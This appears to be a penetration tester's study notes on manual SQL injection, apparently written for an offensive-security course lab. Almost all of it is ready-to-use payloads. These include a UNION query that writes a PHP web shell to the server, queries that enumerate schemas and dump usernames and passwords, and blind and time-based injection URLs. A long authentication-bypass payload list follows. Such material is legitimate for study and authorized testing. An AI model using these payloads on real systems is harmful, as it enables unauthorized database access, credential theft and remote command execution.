Manual SQL Exploitation
Wisdom
https://github.com/swisskyrepo/PayloadsAllTheThings
Check encoding CAREFULLY. Online encoders encode differently to BurpSuite's encoding and sometimes one works/works better over the other.
Original:
High' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/srv/http/cmd.php'; --
Vuln:
CyberChef
BurpSuite
10.2.1 - Initial Tests
Test these on every field
'
''
' OR 1=1
offsec' OR 1=1 -- //
';#---
10.2.2 - Identifying SQLi via error-based payloads
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
UNION-Based payloads
Verify exact number of columns (increase number until returned message is different)
https://infosecwriteups.com/hackthebox-control-51eac2b08a5a
' ORDER BY 1-- //
' ORDER BY 2-- //
' ORDER BY 1-- //
Enumerate the database with SQL UNION injection
%' UNION SELECT database(), user(), @@version, null, null -- //
Shifting functions in the right-most place (column 1 may be reserved for ID field)
' UNION SELECT null, null, database(), user(), @@version -- //
Retrieve columns table from information_schema (current db tables and columns)
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
Query to dump users table
' UNION SELECT null, username, password, description, null FROM users -- //
10.2.3 - Blind SQL Injection
Testing for boolean-based SQLi
Append from ' on the end of the URL
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //
Time-Based SQLi
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //
10.2.4 - Even more SQLi
Master list
';#--- // insert everywhere! Shoutout to xsudoxx!
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
Authentication bypass
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
' || '1'='1';-- -
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin" or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055